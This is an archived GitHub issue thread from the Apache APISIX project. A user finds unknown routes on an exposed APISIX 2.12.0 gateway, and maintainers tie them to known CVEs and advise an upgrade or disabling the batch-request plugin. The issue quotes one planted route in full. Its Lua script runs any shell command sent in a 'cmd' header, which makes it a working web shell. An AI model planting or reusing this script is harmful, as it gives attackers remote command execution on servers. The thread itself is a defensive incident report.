You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@apisix.apache.org by GitBox <gi...@apache.org> on 2022/03/17 04:16:15 UTC

[GitHub] [apisix] qwzhou89 opened a new issue #6638: help request: Why has apisix added some strange routes?

qwzhou89 opened a new issue #6638:
URL: https://github.com/apache/apisix/issues/6638


   ### Description
   
   Today I found some strange routes when I looked at the full routing on the apisix dashboard, as shown below.
   ```json
   {
     "uris": [
       "/NFoRCE"
     ],
     "name": "NFoRCE",
     "methods": [
       "GET",
       "POST",
       "PUT",
       "DELETE",
       "PATCH",
       "HEAD",
       "OPTIONS",
       "CONNECT",
       "TRACE"
     ],
     "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
     "status": 0
   }
   ```
   There are 6 or 7 entries, the URIs (/2BYhX6, /i1MIfe , /atfRv3, /0FBGZj, /WORJ3Q, /OxlDL9, /NFoRCE) are all random, the content is similar and it is a script.
   
   ### Environment
   
   - APISIX version (run `apisix version`):apisix:2.12.0-alpine
   - Operating system (run `uname -a`):Linux tp-apisix-1 4.19.225-0419225-generic #202201110859 SMP Tue Jan 11 14:15:40 UTC 2022 x86_64 Linux
   - OpenResty / Nginx version (run `openresty -V` or `nginx -V`):nginx version: openresty/1.19.9.1
   built by gcc 10.3.1 20210424 (Alpine 10.3.1_git20210424)
   built with OpenSSL 1.1.1g  21 Apr 2020
   TLS SNI support enabled
   configure arguments: --prefix=/usr/local/openresty/nginx --with-cc-opt='-O2 -DAPISIX_BASE_VER=1.19.9.1.3 -DNGX_LUA_ABORT_AT_PANIC -I/usr/local/openresty/zlib/include -I/usr/local/openresty/pcre/include -I/usr/local/openresty/openssl111/include' --add-module=../ngx_devel_kit-0.3.1 --add-module=../echo-nginx-module-0.62 --add-module=../xss-nginx-module-0.06 --add-module=../ngx_coolkit-0.2 --add-module=../set-misc-nginx-module-0.32 --add-module=../form-input-nginx-module-0.12 --add-module=../encrypted-session-nginx-module-0.08 --add-module=../srcache-nginx-module-0.32 --add-module=../ngx_lua-0.10.20 --add-module=../ngx_lua_upstream-0.07 --add-module=../headers-more-nginx-module-0.33 --add-module=../array-var-nginx-module-0.05 --add-module=../memc-nginx-module-0.19 --add-module=../redis2-nginx-module-0.15 --add-module=../redis-nginx-module-0.3.7 --add-module=../ngx_stream_lua-0.0.10 --with-ld-opt='-Wl,-rpath,/usr/local/openresty/luajit/lib -Wl,-rpath,/usr/local/openresty/wasmtime-c-ap
 i/lib -L/usr/local/openresty/zlib/lib -L/usr/local/openresty/pcre/lib -L/usr/local/openresty/openssl111/lib -Wl,-rpath,/usr/local/openresty/zlib/lib:/usr/local/openresty/pcre/lib:/usr/local/openresty/openssl111/lib' --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../mod_dubbo --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../ngx_multi_upstream_module --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../apisix-nginx-module --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../apisix-nginx-module/src/stream --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../wasm-nginx-module --add-module=/tmp/tmp.I9j9kfjRTW/openresty-1.19.9.1/../lua-var-nginx-module --with-poll_module --with-pcre-jit --with-stream --with-stream_ssl_module --with-stream_ssl_preread_module --with-http_v2_module --without-mail_pop3_module --without-mail_imap_module --without-mail_smtp_module --with-http_stub_status_module --with-http_realip_module --with-http_addition_module --with-http_auth_request_modul
 e --with-http_secure_link_module --with-http_random_index_module --with-http_gzip_static_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-threads --with-compat --with-stream --with-http_ssl_module
   - etcd version, if relevant (run `curl http://127.0.0.1:9090/v1/server_info`):
   - APISIX Dashboard version, if relevant:2.10.1-alpine
   - Plugin runner version, for issues related to plugin runners:
   - LuaRocks version, for installation issues (run `luarocks --version`):/usr/local/bin/luarocks 3.8.0
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074707109


   Thanks for your patience, APISIX `2.12.0` affected by [CVE-2022-24112](https://github.com/advisories/GHSA-2vc7-6w39-6rh2), Here is a [Fix PR](https://github.com/apache/apisix/pull/6208) for it. 
   
   Please upgrade your version of APISIX to test if it works.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070382664


   Hello there, there are some checkpoints to check out:
   1. have you changed the password of the apisix-dashboard user administrator ?
   2. is apisix-dashboard exposed to the public network ?


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074913087


   @qwzhou89 Does it solve your problem ?
   > Some link has been updated :)


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] qwzhou89 commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

qwzhou89 commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070360480


   > hello there, It seem you meet the [CVE-2021-45232](https://github.com/advisories/GHSA-wcxq-f256-53xp), you can follow the [issue](https://github.com/apache/apisix-dashboard/issues/2275) to deal with it.
   
   But my version of APISIX Dashboard is already 2.10.1-alpine
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] qwzhou89 commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

qwzhou89 commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070473577


   > Hello there, there are some checkpoints to check out:
   > 
   > 1. have you changed the password of the apisix-dashboard user administrator ?
   yes,I have changed the password of the apisix-dashboard user admin.
   > 2. is apisix-dashboard exposed to the public network ?
   yes ,i use a rotue to exposed apisix-dashboard to the public network.
   
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070312906


   hello there, It seem you meet the CVE-2021-45232, you can follow the [issue](https://github.com/apache/apisix-dashboard/issues/2275) to deal with it.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074707109


   Thanks for your patience, APISIX `2.12.0` affected by [CVE-2022-24112](https://github.com/advisories/GHSA-2vc7-6w39-6rh2), Here is a [Fix PR](https://github.com/apache/apisix/pull/6251) for it. 
   
   Please upgrade your version of APISIX to test if it works.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074828876


   > Does it mean that I should upgrade to 2.12.1?
   
   There are two way to deal will it:
   1. Upgrade APISIX to `2.12.1`.
   2. Disable `batch-request` plugin as #6251 does.
   
   > Also, is there any way to do a smooth upgrade?
   
   No, this is not related to the Nginx hot upgrade, AFAIK, a reboot is in needed.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1080075029


   Considered resolved due to lack of feedback. Feel free to reopen it if needed.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] qwzhou89 commented on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

qwzhou89 commented on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074802564


   > Thanks for your patience, APISIX `2.12.0` affected by [CVE-2022-24112](https://github.com/advisories/GHSA-2vc7-6w39-6rh2), Here is a [Fix PR](https://github.com/apache/apisix/pull/6251) for it.
   > 
   > Please upgrade your version of APISIX to test if it works.
   
   Does it mean that I should upgrade to 2.12.1?
   Also, is there any way to do a smooth upgrade?
   Just like nginx hot upgrade, replace nginx binary, then kill -USR2 PID, kill -WINCH PID


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang closed issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang closed issue #6638:
URL: https://github.com/apache/apisix/issues/6638


   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] qwzhou89 edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

qwzhou89 edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1070473577


   > Hello there, there are some checkpoints to check out:
   > 
   > 1. have you changed the password of the apisix-dashboard user administrator ?
   > 2. is apisix-dashboard exposed to the public network ?
   
   1.yes,I have changed the password of the apisix-dashboard user admin.
   2.yes ,i use a rotue to exposed apisix-dashboard to the public network.
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074828876


   > Does it mean that I should upgrade to 2.12.1?
   
   There are two way to deal with it:
   1. Upgrade APISIX to `2.12.1`.
   2. Disable `batch-request` plugin as #6251 does.
   
   > Also, is there any way to do a smooth upgrade?
   
   No, this is not related to the Nginx hot upgrade, AFAIK, a reboot is in needed.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org

[GitHub] [apisix] leslie-tsang edited a comment on issue #6638: help request: Why has apisix added some strange routes?

Posted by GitBox <gi...@apache.org>.

leslie-tsang edited a comment on issue #6638:
URL: https://github.com/apache/apisix/issues/6638#issuecomment-1074828876


   > Does it mean that I should upgrade to 2.12.1?
   
   There are two way to deal with it:
   1. Upgrade APISIX to `2.12.1`.
   2. Disable `batch-request` plugin as #6208 does.
   
   > Also, is there any way to do a smooth upgrade?
   
   No, this is not related to the Nginx hot upgrade, AFAIK, a reboot is in needed.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@apisix.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org